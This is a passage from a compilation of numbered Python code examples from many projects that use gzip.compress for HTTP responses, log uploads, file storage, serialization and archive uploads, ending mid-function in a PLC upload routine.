Example no. 1
    def dump(self, file='', compress=False):
        """
        Dumps content of the generator to memory or file: text or gzipped
        :param file: dumps to file if specified
        :param compress: gzip dumped content of a generator
        :return:
        """

        if file:  # dumping to file
            try:
                with open(file, 'wb') as f:
                    if compress:
                        f.write(gzip.compress(b''.join(self.generate(opt=self.opt))))
                    else:
                        for point in self.generate(opt=self.opt):
                            f.write(point)
            except IOError as err:
                logging.error('Error dumping to <%s>: %s', file, err)

        else:  # in-memory dumping
            if compress:
                points = gzip.compress(b''.join(self.generate(opt=self.opt)))
            else:
                points = b''.join(self.generate(opt=self.opt))
            return points
Example no. 2
    def test_gzip_uncompress(self):
        self.assertEqual(
            b'DRAGON',
            gzip_uncompress(gzip.compress(b'DRAGON'))
            )

        # Check for no crash:
        gzip_uncompress(gzip.compress(b'DRAGON')[:1], truncated=True)
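The gzip_uncompress helper under test is not shown here. A minimal sketch of what such a function might look like, assuming the truncated flag is meant to tolerate incomplete streams (both the signature and the zlib-based fallback are assumptions for illustration):

import gzip
import zlib

def gzip_uncompress(data, truncated=False):
    # Hypothetical sketch: gzip.decompress() raises on an incomplete stream,
    # so a streaming zlib decompressor (wbits=16+MAX_WBITS reads gzip framing)
    # is used to return whatever can be recovered from truncated input.
    if not truncated:
        return gzip.decompress(data)
    return zlib.decompressobj(wbits=16 + zlib.MAX_WBITS).decompress(data)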
Example no. 3
def main(argv=None):
    if (argv is None):
        argv = sys.argv[1:]

    arch = DefaultArchiver()
    arch.debug(3)
    arch.exclude(".svn")
    arch.includeall(".")
    arch.list()

    hexdigest = arch.digest(__file__, "hexdigest.log", "md5")
    with open("hexdigest.log", "r") as f:
        contents = f.read()
    os.remove("hexdigest.log")
    print(hexdigest)
    assert hexdigest == contents

    jar = JarArchiver()
    jar.debug(3)
    #TODO:

    gzip = GzipArchiver()
    gzip.debug(3)
    gzip.compress(__file__, __file__ + ".gz")
    gzip.decompress(__file__ + ".gz", __file__ + ".gzbak")
    gzip.dump(__file__ + ".gzbak")
    os.remove(__file__ + ".gz")
    os.remove(__file__ + ".gzbak")

    zip = ZipArchiver("../cwd.zip")
    zip.debug(3)
    zip.exclude(".svn")
    zip.includeall(".")
    zip.list()
    zip.list(None, "../cwd-zip.log")
    zip.assemble()
    zip.list("../cwd.zip")
    zip.list("../cwd.zip", "../cwd2-zip.log")
    os.remove("../cwd.zip")
    os.remove("../cwd-zip.log")
    os.remove("../cwd2-zip.log")

    tar = TarArchiver("cwd.tgz")
    tar.debug(3)
    tar.exclude(".svn")
    tar.includeall(".")
    tar.list()
    tar.list(None, "cwd-tgz.log")
    tar.assemble()
    tar.list("cwd.tgz")
    tar.list("cwd.tgz", "cwd2-tgz.log")
    os.remove("cwd.tgz")
    os.remove("cwd-tgz.log")
    os.remove("cwd2-tgz.log")
Example no. 4
def encode_data(file_name, python_object, mimetype='', secret_key=''):

# parse extension type
    file_type = ''
    extension_map = {
        '.+\\.json$': 'json',
        '.+\\.json\\.gz$': 'json.gz',
        '.+\\.ya?ml$': 'yaml',
        '.+\\.ya?ml\\.gz$': 'yaml.gz',
        '.+\\.drep$': 'drep',
        '.+\\.md$': 'txt',
        '.+\\.txt$': 'txt'
    }
    import re
    for key, value in extension_map.items():
        file_pattern = re.compile(key)
        if file_pattern.findall(file_name):
            file_type = value
            break

# construct file data
    if file_type == 'json':
        import json
        byte_data = json.dumps(python_object, indent=2).encode('utf-8')
    elif file_type == 'yaml':
        import yaml
        byte_data = yaml.dump(python_object).encode('utf-8')
    elif file_type == 'json.gz':
        import json
        import gzip
        file_bytes = json.dumps(python_object).encode('utf-8')
        byte_data = gzip.compress(file_bytes)
    elif file_type == 'yaml.gz':
        import yaml
        import gzip
        file_bytes = yaml.dump(python_object).encode('utf-8')
        byte_data = gzip.compress(file_bytes)
    elif file_type == 'drep':
        from labpack.compilers import drep
        byte_data = drep.dump(python_object, secret_key)
    elif file_type == 'txt':
        byte_data = python_object.encode('utf-8')
    elif secret_key:
        from labpack.encryption import cryptolab
        byte_data, secret_key = cryptolab.encrypt(python_object, secret_key)
    else:
        if not isinstance(python_object, bytes):
            raise ValueError('%s file data must be byte data.' % file_name)
        byte_data = python_object
    
    return byte_data
Example no. 5
def pip3line_transform(inputData):
	ret = None
	if (Pip3line_INBOUND):
		ret = bytearray(gzip.compress(inputData))
	else:
		ret = bytearray(gzip.decompress(inputData))
	return ret
def main():
    """
    Converts the Trello documentation into a data structure and prints it
    to standard output.

    """
    ep = requests.get(TRELLO_API_DOC).content
    root = html.fromstring(ep)

    links = root.xpath('//a[contains(@class, "reference internal")]/@href')
    pages = [requests.get(TRELLO_API_DOC + u)
             for u in links if u.endswith('index.html')]

    endpoints = []
    for page in pages:
        root = html.fromstring(page.content)
        sections = root.xpath('//div[@class="section"]/h2/..')
        for sec in sections:
            ep_html = etree.tostring(sec).decode('utf-8')
            ep_text = html2text(ep_html).splitlines()
            match = EP_DESC_REGEX.match(ep_text[0])
            if not match:
                continue
            ep_method, ep_url = match.groups()
            ep_text[0] = ' '.join([ep_method, ep_url])
            ep_doc = b64encode(gzip.compress('\n'.join(ep_text).encode('utf-8')))
            endpoints.append((ep_method, ep_url, ep_doc))

    print(yaml.dump(create_tree(endpoints)))
Example no. 7
def test_forwarding_content_encoding(
    compress_request, compress_response, mini_sentry, relay_chain
):
    data = b"foobar"

    @mini_sentry.app.route("/api/test/reflect", methods=["POST"])
    def test():
        _data = request.data
        if request.headers.get("Content-Encoding", "") == "gzip":
            _data = gzip.decompress(_data)

        assert _data == data

        headers = {}

        if compress_response:
            _data = gzip.compress(_data)
            headers["Content-Encoding"] = "gzip"

        return Response(_data, headers=headers)

    relay = relay_chain()
    relay.wait_relay_healthcheck()

    headers = {"Content-Type": "application/octet-stream"}

    if compress_request:
        payload = gzip.compress(data)
        headers["Content-Encoding"] = "gzip"
    else:
        payload = data

    response = relay.post("/api/test/reflect", data=payload, headers=headers)
    response.raise_for_status()
    assert response.content == data
Example no. 8
def servalue(key, value, compression=None):
    """Serialize key and value to a single value blob optionally applying compression."""
    value = dumps([key, value])
    if compression == Compression.gzip:
        # See: https://quixdb.github.io/squash-benchmark/#results
        value = gzip.compress(value, compresslevel=1)
    return value
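The matching deserializer is not part of this example. A minimal inverse sketch, assuming dumps/loads here are pickle's and that gzipped blobs can be recognized by the gzip magic bytes:

import gzip
from pickle import loads  # assumption: servalue()'s dumps is pickle.dumps

def deservalue(blob):
    # Hypothetical inverse of servalue(): returns the (key, value) pair.
    if blob[:2] == b'\x1f\x8b':  # gzip magic number
        blob = gzip.decompress(blob)
    key, value = loads(blob)
    return key, value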
Example no. 9
def push_audit_log(config: dict, instance_logs_url, account_id, region, instance_id, boot_time, fn, compress=False):
    userAndPass = b64encode(bytes('{}:{}'.format(
            config.get('logsink_username'),
            config.get('logsink_password')),
            encoding='ascii')).decode("ascii") or ''

    with open(fn, 'rb') as fd:
        contents = fd.read()
    if compress:
        contents = gzip.compress(contents)
    logging.info('Pushing {} ({} Bytes) to {}..'.format(fn, len(contents), instance_logs_url))
    data = {'account_id': str(account_id),
            'region': region,
            'instance_boot_time': boot_time,
            'instance_id': instance_id,
            'log_data': codecs.encode(contents, 'base64').decode('utf-8'),
            'log_type': 'AUDIT_LOG'}
    try:
        response = requests.post(instance_logs_url, data=json.dumps(data),
                                 headers={'Content-Type': 'application/json',
                                          'Authorization': 'Basic {}'.format(userAndPass)})
        if response.status_code == 201:
            os.remove(fn)
        else:
            logging.warning('Failed to push audit log: server returned HTTP status {}: {}'.format(
                         response.status_code, response.text))
    except:
        logging.exception('Failed to push audit log')
Example no. 10
def save_file(outpath, text, compress=True):
    if compress is True:
        text = gzip.compress(text)
        if not outpath.endswith('.gz'):
            outpath += '.gz'
    with open(outpath, 'wb') as o:
        o.write(text)
Example no. 11
def test_SimpleHDFWriter_small():
  fn = _get_tmp_file(suffix=".hdf")
  n_dim = 3
  writer = SimpleHDFWriter(filename=fn, dim=n_dim, labels=None)
  seq_lens = [2, 3]
  writer.insert_batch(
    inputs=numpy.random.normal(size=(len(seq_lens), max(seq_lens), n_dim)).astype("float32"),
    seq_len=seq_lens,
    seq_tag=["seq-%i" % i for i in range(len(seq_lens))])
  writer.close()

  dataset = HDFDataset(files=[fn])
  reader = _DatasetReader(dataset=dataset)
  reader.read_all()
  assert "data" in reader.data_keys  # "classes" might be in there as well, although not really correct/existing
  assert reader.data_sparse["data"] is False
  assert list(reader.data_shape["data"]) == [n_dim]
  assert reader.data_dtype["data"] == "float32"
  assert len(seq_lens) == reader.num_seqs
  for i, seq_len in enumerate(seq_lens):
    assert reader.seq_lens[i]["data"] == seq_len

  if sys.version_info[0] >= 3:  # gzip.compress is >=PY3
    print("raw content (gzipped):")
    import gzip
    print(repr(gzip.compress(open(fn, "rb").read())))
Example no. 12
    def write_content(self, content, content_type=None):
        """Helper method to write content bytes to output stream."""
        if content_type is not None:
            self.send_header(HTTP_HEADER_CONTENT_TYPE, content_type)

        if 'gzip' in self.headers.get(HTTP_HEADER_ACCEPT_ENCODING, ''):
            content = gzip.compress(content)

            self.send_header(HTTP_HEADER_CONTENT_ENCODING, "gzip")
            self.send_header(HTTP_HEADER_VARY, HTTP_HEADER_ACCEPT_ENCODING)

        self.send_header(HTTP_HEADER_CONTENT_LENGTH, str(len(content)))

        cors_check = (self.headers.get("Origin") in self.server.cors_origins)

        cors_headers = ", ".join(ALLOWED_CORS_HEADERS)

        if self.server.cors_origins and cors_check:
            self.send_header(HTTP_HEADER_ACCESS_CONTROL_ALLOW_ORIGIN,
                             self.headers.get("Origin"))
            self.send_header(HTTP_HEADER_ACCESS_CONTROL_ALLOW_HEADERS,
                             cors_headers)
        self.end_headers()

        if self.command == 'HEAD':
            return

        self.wfile.write(content)
 def _compressDataAndNotifyQt(data_to_append):
     compressed_data = gzip.compress(data_to_append.encode("utf-8"))
     self._progress_message.setProgress(-1)  # Tickle the message so that it's clear that it's still being used.
     QCoreApplication.processEvents()  # Ensure that the GUI does not freeze.
     # Pretend that this is a response, as zipping might take a bit of time.
     self._last_response_time = time.time()
     return compressed_data
Example no. 14
 def setUp(self):
     # Create a "__category__" job
     self.category_job = JobDefinition({
         "plugin": "local",
         "name": "__category__"
     })
     # Create a "generator" job
     self.generator_job = JobDefinition({
         "plugin": "local",
         "name": "generator"
     })
     # Keep a variable for the (future) generated job
     self.generated_job = None
     # Create a result for the "__category__" job.
     # It must define a verbatim copy of the "generator" job
     self.category_result = MemoryJobResult({
         "io_log": [
             (0.0, "stdout", b'plugin:local\n'),
             (0.1, "stdout", b'name:generator\n'),
         ]
     })
     # Create a result for the "generator" job.
     # It will define the "generated" job
     self.generator_result = MemoryJobResult({
         "io_log": [(0.0, 'stdout', b'name:generated')]
     })
     self.job_list = [self.category_job, self.generator_job]
     self.suspend_data = gzip.compress(
         json.dumps(self.full_repr).encode("UTF-8"))
Example no. 15
    def _getfile(self, relpath):
        """
        Returns an http.File object for the given self.path / relpath combination.
        """
        fqn = abspath(join(self.path, relpath))
        if not exists(fqn):
            logger.debug('Not found: url=%r fqn=%r', relpath, fqn)
            raise HttpError(404, relpath)

        if re_dots.search(relpath):
            # This means someone used ".." to try to move up out of the static directory.  This
            # very well may be a hack attempt.
            logger.error('SECURITY: Dangerous path in file download?  prefix=%s self.path=%s relpath=%s fqn=%s',
                        self.prefix, self.path, relpath, fqn)
            raise HttpError(404, relpath)

        ext = splitext(relpath)[1]
        if ext not in map_ext_to_mime:
            raise Exception('No mimetype for "{}" (from {!r})'.format(ext, relpath))

        content = open(fqn, 'rb').read()
        extinfo = map_ext_to_mime[ext]

        if extinfo.compress:
            content = gzip.compress(content)

        entry = File(relpath, extinfo.mimetype, content, extinfo.compress, cache_control=self.cache_control)

        return entry
Example no. 16
    def calc_compression_test(bcontent: bytearray, verbose: bool) -> float:
        """
        Calculates the randomness of the content using the Kolmogorov complexity

        We compress the content and evaluate the grade of the compression:
        - the less the content compresses, the higher the randomness: len(zipped)/len(content)
        :param bcontent: byte content
        :param verbose:
        :return: [0,1]
        """

        def compress(data):
            return gzip.compress(data, 9)

        def get_compressed_footprint():
            return len(compress(bytes([0x0])))

        # if print_path:
        #    print("The content is: %s" % content)
        len_bcontent = len(bcontent)
        if len_bcontent == 0:
            if verbose:
                print("Empty string, nothing to do!")
            return 0

        len_compr_cnt = len(gzip.compress(bcontent, 9))
        # deleting the footprint for the compression
        len_compr_cnt_1 = (len_compr_cnt - get_compressed_footprint()) * 1.0
        rand = len_compr_cnt_1 / len_bcontent

        if verbose:
            print("-> [Compression Test] crypto values: n: %s, d: %s, l0: %s, rand ratio: %s " % (
                len_compr_cnt_1, len_bcontent, get_compressed_footprint(), rand))

        return rand
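A standalone illustration of the idea behind this test: already-random bytes barely compress, so their ratio stays near (or above) 1.0, while highly regular data compresses to a tiny fraction of its size. This is an independent sketch, not part of the original class:

import gzip
import os

def compression_ratio(bcontent):
    # Compressed size over raw size, as a rough randomness indicator.
    if not bcontent:
        return 0.0
    return len(gzip.compress(bcontent, 9)) / len(bcontent)

print(compression_ratio(os.urandom(4096)))  # random data: ratio close to 1.0
print(compression_ratio(b"A" * 4096))       # repetitive data: ratio close to 0.0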
Example no. 17
def compress_textures(filenames, dest):
    utils.pg_init((10, 10))
    data = []

    for name in filenames:
        try:
            textures = PackedTextureGroup(name)
        except FileNotFoundError:
            continue
        image = textures.pack.image
        rawImageStr = pg.image.tostring(image, 'RGB')
        compressedImageStr = gzip.compress(rawImageStr)
        utils.debug('compressed size: {}MB. ratio: {}'.format(
            len(compressedImageStr) / 1024 ** 2,
            len(compressedImageStr) / len(rawImageStr)
        ))
        textureMetas = []
        for p, (id, t) in zip(textures.pack.poses, textures.iter_all()):
            textureMetas.append((
                id, t.xoff, t.yoff, p[0], p[1], t.image.get_width(), t.image.get_height(),
            ))
        metaItem = {
            'name': textures.name,
            'size': image.get_size(),
            'format': 'RGB',
            'image': compressedImageStr,
            'textureMetas': textureMetas,
        }
        data.append(metaItem)
    with open(dest, 'wb') as outfile:
        pickle.dump(data, outfile, -1)
Example no. 18
	def send(self, data_type, data, mac=None, gzip_data=False):
		"""
		Args:
			data_type (int): Number between 1 and 255 (1-63 are reserved)
			data (string): Unicode String
		
		Optional Args:
			mac (string): Alfred server will use local mac if not set
			gzip_data (bool): Send data gzip compressed
		"""
		client = self._get_alfred_socket()

		if mac:
			mac = [int(i, 16) for i in mac.strip().split(":")]
		else:
			# ALFRED server will fill this field
			mac = [0] * ETH_ALEN

		data = data.encode("UTF-8")
		if gzip_data:
			data = gzip.compress(data)
		data_tlv = alfred_tlv.pack(data_type, ALFRED_VERSION, len(data))
		source = mac_address.pack(*mac)
		pkt_data = alfred_data.pack(source, data_tlv) + data

		request_id = randint(0, 65535)
		seq_id = 0
		txm = alfred_transaction_mgmt.pack(request_id, seq_id)
		tlv = alfred_tlv.pack(AlfredPacketType.ALFRED_PUSH_DATA, ALFRED_VERSION, len(pkt_data) + len(txm))
		pkt_push_data = alfred_push_data_v0.pack(tlv, txm) + pkt_data

		client.send(pkt_push_data)
		client.close()
Example no. 19
	def update(self, view):
		r = sublime.Region(0, view.size())
		text = bytes(view.substr(r), 'utf-8')
		bytes_len = len(gzip.compress(text))
		fmt_len = sizeof_fmt(bytes_len)
		view.erase_status("gzippedSize")
		view.set_status("gzippedSize", "GZip %s" % fmt_len)
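The sizeof_fmt helper used above is not included in this example. A typical human-readable size formatter it might correspond to (an assumption, shown only for completeness):

def sizeof_fmt(num, suffix='B'):
    # Hypothetical stand-in for the sizeof_fmt() helper referenced above.
    for unit in ('', 'K', 'M', 'G', 'T'):
        if abs(num) < 1024.0:
            return '%3.1f %s%s' % (num, unit, suffix)
        num /= 1024.0
    return '%.1f %s%s' % (num, 'P', suffix)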
Example no. 20
def push_audit_log(config: dict, instance_logs_url, account_id, region, instance_id, boot_time, fn, compress=False):
    token = get_token(config, 'taupage', ['uid']) or {}

    with open(fn, 'rb') as fd:
        contents = fd.read()
    if compress:
        contents = gzip.compress(contents)
    logging.info('Pushing {} ({} Bytes) to {}..'.format(fn, len(contents), instance_logs_url))
    data = {'account_id': str(account_id),
            'region': region,
            'instance_boot_time': boot_time,
            'instance_id': instance_id,
            'log_data': codecs.encode(contents, 'base64').decode('utf-8'),
            'log_type': 'AUDIT_LOG'}
    try:
        response = requests.post(instance_logs_url, data=json.dumps(data),
                                 headers={'Content-Type': 'application/json',
                                          'Authorization': 'Bearer {}'.format(token.get('access_token'))})
        if response.status_code == 201:
            os.remove(fn)
        else:
            logging.warning('Failed to push audit log: server returned HTTP status {}: {}'.format(
                         response.status_code, response.text))
    except:
        logging.exception('Failed to push audit log')
Example no. 21
File: views.py Project: aeud/sing
def export_job(request, job):
    account = request.user.account
    conn = S3Connection(aws_access_key_id=account.aws_access_key_id, aws_secret_access_key=account.aws_secret_access_key)
    bucket = conn.get_bucket('lx-pilot')
    key = Key(bucket)
    key.key = job.cache_key
    string = gzip.decompress(key.get_contents_as_string())
    result = json.loads(string.decode('utf-8'))
    rows = result.get('rows')
    rows = [rm_dict_row(row) for row in rows]
    output = StringIO()
    writer = csv.writer(output)
    writer.writerows(rows)
    now = timezone.now()
    key_string = 'exports/' + str(now.year) + '/' + str(now.month) + '/' + str(now.day) + '/' + str(uuid.uuid4())
    export = JobExport(job=job, created_by=request.user, key=key_string)
    key = Key(bucket)
    key.key = export.key
    key.set_metadata('Content-Type', 'text/csv')
    key.set_metadata('Content-Encoding', 'gzip')
    key.set_contents_from_string(gzip.compress(bytes(output.getvalue(), 'utf-8')))
    key.close()
    key = Key(bucket)
    key.key = export.key
    export.save()
    return export
Example no. 22
def send_omf_message_to_endpoint(message_type, message_omf_json):
    try:
        # Compress json omf payload, if specified
        compression = 'none'
        if USE_COMPRESSION:
            msg_body = gzip.compress(bytes(json.dumps(message_omf_json), 'utf-8'))
            compression = 'gzip'
        else:
            msg_body = json.dumps(message_omf_json)
        # Assemble headers
        msg_headers = {
            'producertoken': PRODUCER_TOKEN,
            'messagetype': message_type,
            'action': 'create',
            'messageformat': 'JSON',
            'omfversion': '1.0',
            'compression': compression
        }
        # Send the request, and collect the response
        response = requests.post(
            INGRESS_URL,
            headers = msg_headers,
            data = msg_body,
            verify = VERIFY_SSL,
            timeout = WEB_REQUEST_TIMEOUT_SECONDS
        )
        # Print a debug message, if desired; note: you should receive a
        # response code 204 if the request was successful!
        print('Response from relay from the initial "{0}" message: {1} {2}'.format(message_type, response.status_code, response.text))
    
    except Exception as e:
        # Log any error, if it occurs
        print(str(datetime.datetime.now()) + " An error occurred during web request: " + str(e))
Example no. 23
    def dbmodel(self, database):
        from palladium.util import session_scope

        model = Dummy(
            name='mymodel',
            __metadata__={'some': 'metadata', 'version': 1},
            )

        model_blob = gzip.compress(pickle.dumps(model), compresslevel=0)
        chunk_size = 4
        chunks = [model_blob[i:i + chunk_size]
                  for i in range(0, len(model_blob), chunk_size)]

        dbmodel = database.DBModel(
            version=1,
            chunks=[
                database.DBModelChunk(
                    model_version=1,
                    blob=chunk,
                    )
                for chunk in chunks
                ],
            metadata_=json.dumps(model.__metadata__),
            )

        with session_scope(database.session) as session:
            session.add(dbmodel)

        return model
Example no. 24
    def write_file_pointer(self, content_type, inp):
        """
        Helper function to write a file pointer to the user.
        Does not do error handling.
        """
        do_gzip = 'gzip' in self.headers.get(HTTP_HEADER_ACCEPT_ENCODING, '')

        self.send_response(HTTP_OK)
        self.send_header(HTTP_HEADER_CONTENT_TYPE, content_type)

        self.set_cache_header()
        self.set_session_cookie_header()

        if do_gzip:
            gzip_data = gzip.compress(inp.read())

            self.send_header(HTTP_HEADER_CONTENT_ENCODING, "gzip")
            self.send_header(HTTP_HEADER_VARY, HTTP_HEADER_ACCEPT_ENCODING)
            self.send_header(HTTP_HEADER_CONTENT_LENGTH, str(len(gzip_data)))

        else:
            fst = os.fstat(inp.fileno())
            self.send_header(HTTP_HEADER_CONTENT_LENGTH, str(fst[6]))

        self.end_headers()

        if self.command == 'HEAD':
            return

        elif do_gzip:
            self.wfile.write(gzip_data)

        else:
            self.copyfile(inp, self.wfile)
Example no. 25
    def setUp(self):
        import gzip
        import zlib

        self.test_string_binary = "This is the test string.".encode("utf-8")
        self.compressed_gzip = gzip.compress(self.test_string_binary)
        self.compressed_zlib = zlib.compress(self.test_string_binary)
Example no. 26
def compress(data, method):
    if method == CompressionMethod.Gzip:
        obj = gzip.compress(data.data())
    elif method == CompressionMethod.Zlib:
        obj = zlib.compress(data.data())
    else:
        # Avoid returning an unbound name for unknown methods
        raise ValueError('Unsupported compression method: {}'.format(method))

    return QByteArray(obj)
Example no. 27
def __jobend(job_id, cmd_rtrn, cmd_out):
    post_headers = {
        'Content-Type': 'application/x-www-form-urlencoded',
        'Accept': 'text/plain'
    }
    if type(cmd_out) is str:
        cmd_out = cmd_out.encode('utf-8', 'replace')
    else:
        cmd_out = cmd_out.read()
    cmd_out_encoded = ''
    if cmd_out is not None:
        try:
            cmd_out_encoded = b64encode(gzip.compress(cmd_out))
        except Exception as e:
            tsadm.log.err('b64encode: ', e)
    post_params = urllib.parse.urlencode({
        'cmd_rtrn': cmd_rtrn,
        'cmd_out': cmd_out_encoded
    })
    post_url = '{}/{}/'.format(end_url_prefix, job_id)
    try:
        conn.connect()
        conn.request('POST', post_url, post_params, post_headers)
        resp = conn.getresponse()
        conn.close()
    except Exception as e:
        tsadm.log.err('jobq end: ', post_url)
        tsadm.log.err('could not update: ', e)
        __exit(3)
    if resp.status != 200:
        tsadm.log.err('jobq end: {} {} {}'.format(post_url, resp.status, resp.reason))
        __exit(3)
    return resp.status
Example no. 28
    async def notify(self, task_data, exchange_config):
        log.debug('log_collect called for %r', task_data)
        log_data = task_data.log_data()
        if not log_data:
            log.debug('No logs for %r', task_data)
            return

        s3 = boto3.resource('s3', aws_access_key_id=self.access_key_id, aws_secret_access_key=self.secret_access_key)
        log_bucket = s3.Bucket(self.s3_bucket)

        for run_log in log_data:
            #  Use gzip compression on log
            log.debug('Compressing artifact.')
            try:
                if type(run_log['data']) is str:
                    log.debug('Artifact with key %s is str, converting', run_log['s3_key'])
                    task_log = bytes(run_log['data'], 'utf-8')
                else:
                    task_log = run_log['data']

                log_gzip = gzip.compress(task_log)
            except TypeError as te:
                log.exception('TypeError: %s', te)
                # Skip this run log; log_gzip would be undefined in the upload below
                continue

            #  Upload log to S3 bucket
            log_bucket.put_object(Body=log_gzip, Key=run_log['s3_key'], **HEADER)

            log.info('%s: log for %r uploaded to Amazon S3', self.name, task_data)
Example no. 29
def process(limit=None, category=0):
    """Process releases for NFO parts and download them."""

    with Server() as server:
        with db_session() as db:
            # noinspection PyComparisonWithNone,PyComparisonWithNone
            query = db.query(Release).join(Group).join(NZB).filter(Release.nfo == None).filter(
                Release.nfo_metablack_id == None)
            if category:
                query = query.filter(Release.category_id == int(category))

            if limit:
                releases = query.order_by(Release.posted.desc()).limit(limit)
            else:
                releases = query.order_by(Release.posted.desc()).all()

            for release in releases:
                found = False
                nzb = pynab.nzbs.get_nzb_details(release.nzb)

                if nzb:
                    nfos = []
                    for nfo in nzb['nfos']:
                        for part in nfo['segments']:
                            if int(part['size']) > NFO_MAX_FILESIZE:
                                continue
                            nfos.append(part)

                    for nfo in nfos:
                        try:
                            article = server.get(release.group.name, [nfo['message_id'], ])
                        except Exception as e:
                            # if usenet's not accessible, don't block it forever
                            log.error('nfo: unable to get nfo: {}'.format(e))
                            continue

                        if article:
                            data = gzip.compress(article.encode('utf-8'))
                            nfo = NFO(data=data)
                            db.add(nfo)

                            release.nfo = nfo
                            release.nfo_metablack_id = None
                            db.add(release)

                            log.debug('nfo: [{}] - nfo added'.format(
                                release.search_name
                            ))
                            found = True
                            break

                    if not found:
                        log.debug('nfo: [{}] - [{}] - no nfos in release'.format(
                            release.id,
                            release.search_name
                        ))
                        mb = MetaBlack(nfo=release, status='IMPOSSIBLE')
                        db.add(mb)
                db.commit()
Example no. 30
def compress(text):
    if sys.version_info < (3, 2):
        out = StringIO()
        with gzip.GzipFile(fileobj=out, mode="w") as f:
            f.write(text)
        return out.getvalue()
    else:
        return gzip.compress(text.encode('utf-8'))
Example no. 31
def encode(method: str, **args) -> str:
    json_str = json.dumps({
        "method": method,
        "params": args,
    }).encode()
    return base64.b64encode(gzip.compress(json_str, 9)).decode()
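A possible inverse of encode() for completeness (hypothetical, not part of the original example):

import base64
import gzip
import json

def decode(payload: str) -> dict:
    # Hypothetical inverse of encode(): base64-decode, gunzip, parse JSON.
    return json.loads(gzip.decompress(base64.b64decode(payload)))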
Example no. 32
    if not args:
        parser.print_help()
        sys.exit(-1)

    infile = args[0]

    if options.name:
        name = options.name
    else:
        name = replacelst(os.path.basename(infile), [' ', '-', '.'], '_')

    if options.outfname:
        #    fout = open(options.outfname, 'w+')
        fout = codecs.open(options.outfname, 'w+', encoding='utf8')
    else:
        fout = sys.stdout

    fin = open(infile, 'rb')
    data = fin.read()
    fin.close()

    if options.compress:
        data = gzip.compress(data)

    size = len(data)
    bin2hex(fout, name, data, size)

    if options.header:
        fin = c_hdr_open(options.header)
        c_hdr_update(fin, name, size)
Example no. 33
File: util.py Project: jm-cc/gcvb
def file_to_compressed_binary(file_in):
    with open(file_in, "rb") as f:
        content = f.read()
    return gzip.compress(content)
Example no. 34
def _compress(content: bytes) -> bytes:
    return gzip.compress(content)
Example no. 35
    def plcupload(self):
        u"""Uploads the given project to the RevPi.
        @return True on successful processing"""
        tup = self.lst_typeup.index(self.var_typeup.get())
        dirselect = ""
        dirtmp = None
        filelist = []
        fileselect = None
        foldername = ""
        rscfile = None

        if tup == 0:
            # File
            fileselect = tkfd.askopenfilenames(
                parent=self.master,
                title="Upload Python program...",
                initialdir=self.opt.get("plcupload_dir", homedir),
                filetypes=(("Python", "*.py"), (_("All files"), "*.*"))
            )
            if type(fileselect) == tuple and len(fileselect) > 0:
                for file in fileselect:
                    filelist.append(file)

        elif tup == 1:
            # Folder
            dirselect = tkfd.askdirectory(
                parent=self.master,
                title=_("Folder to upload"),
                mustexist=True,
                initialdir=self.opt.get("plcupload_dir", homedir)
            )

            # Remember the folder name so it can be created on the RevPi
            foldername = os.path.basename(dirselect)

            if type(dirselect) == str and dirselect != "":
                filelist = self.create_filelist(dirselect)

        elif tup == 2:
            # Zip
            fileselect = tkfd.askopenfilename(
                parent=self.master,
                title=_("Upload Zip archive..."),
                initialdir=self.opt.get("plcupload_file", ""),
                initialfile=self.revpi + ".zip",
                filetypes=(
                    (_("Zip archive"), "*.zip"), (_("All files"), "*.*")
                )
            )
            if type(fileselect) == str and fileselect != "":
                # Check the zip file
                if zipfile.is_zipfile(fileselect):
                    dirtmp = mkdtemp()
                    fhz = zipfile.ZipFile(fileselect)
                    fhz.extractall(dirtmp)
                    fhz.close()

                    filelist = self.create_filelist(dirtmp)
                    dirselect, rscfile = self.check_replacedir(dirtmp)

                else:
                    tkmsg.showerror(
                        _("Error"),
                        _("The specified file is not a ZIP archive."),
                        parent=self.master
                    )
                    return False

        elif tup == 3:
            # TarGz
            fileselect = tkfd.askopenfilename(
                parent=self.master,
                title=_("Upload TarGz archive..."),
                initialdir=self.opt.get("plcupload_file", ""),
                initialfile=self.revpi + ".tar.gz",
                filetypes=(
                    (_("TGZ archive"), "*.tar.gz"), (_("All files"), "*.*")
                )
            )
            if type(fileselect) == str and fileselect != "":

                # Check the tar file
                if tarfile.is_tarfile(fileselect):
                    dirtmp = mkdtemp()
                    fht = tarfile.open(fileselect)
                    fht.extractall(dirtmp)
                    fht.close()

                    filelist = self.create_filelist(dirtmp)
                    dirselect, rscfile = self.check_replacedir(dirtmp)

                else:
                    tkmsg.showerror(
                        _("Error"),
                        _("The specified file is not a TAR archive."),
                        parent=self.master
                    )
                    return False

        # If no files were selected
        if len(filelist) == 0:
            return True

        # Clean up before the transfer if selected
        if self.var_cleanup.get() and not self.xmlcli.plcuploadclean():
            tkmsg.showerror(
                _("Error"),
                _("There was an error deleting the files on the "
                    "Revolution Pi."),
                parent=self.master
            )
            return False

        # Read the currently configured program (for the uploaded flag)
        opt_program = self.xmlcli.get_config()
        opt_program = opt_program.get("plcprogram", "none.py")
        self.uploaded = True
        ec = 0

        for fname in filelist:

            if fname == rscfile:
                continue

            # FIXME: error handling for file reading
            with open(fname, "rb") as fh:

                # Determine the file name
                if dirselect == "":
                    sendname = os.path.basename(fname)
                else:
                    # Include the folder name in the file path for the RevPi
                    sendname = os.path.join(
                        foldername,
                        fname.replace(dirselect, "")[1:]
                    )

                # Check whether this file name is already set as the start program
                if sendname == opt_program:
                    self.uploaded = False

                # Transfer the file
                try:
                    ustatus = self.xmlcli.plcupload(
                        Binary(gzip.compress(fh.read())), sendname)
                except Exception:
                    ec = -2
                    break

                if not ustatus:
                    ec = -1
                    break

        if ec == 0:
            tkmsg.showinfo(
                _("Success"),
                _("The PLC program was transferred successfully."),
                parent=self.master
            )

            if self.var_picup.get():
                if rscfile is not None:
                    self.setpictoryrsc(rscfile)
                else:
                    tkmsg.showerror(
                        _("Error"),
                        _("There is no piCtory configuration in this "
                            "archive."),
                        parent=self.master
                    )

            # Save settings
            if tup == 0:
                self.opt["plcupload_dir"] = os.path.dirname(fileselect[0])
            elif tup == 1:
                self.opt["plcupload_dir"] = dirselect
            else:
                self.opt["plcupload_file"] = os.path.dirname(fileselect)

            self.opt["typeup"] = self.var_typeup.get()
            self.opt["picup"] = self.var_picup.get()
            _savedefaults(self.revpi, self.opt)

        elif ec == -1:
            tkmsg.showerror(
                _("Error"),
                _("The Revolution Pi could not process some parts of the "
                    "transmission."),
                parent=self.master
            )

        elif ec == -2:
            tkmsg.showerror(
                _("Error"),
                _("Errors occurred during transmission"),
                parent=self.master
            )

        # Clean up the temp dir
        if dirtmp is not None:
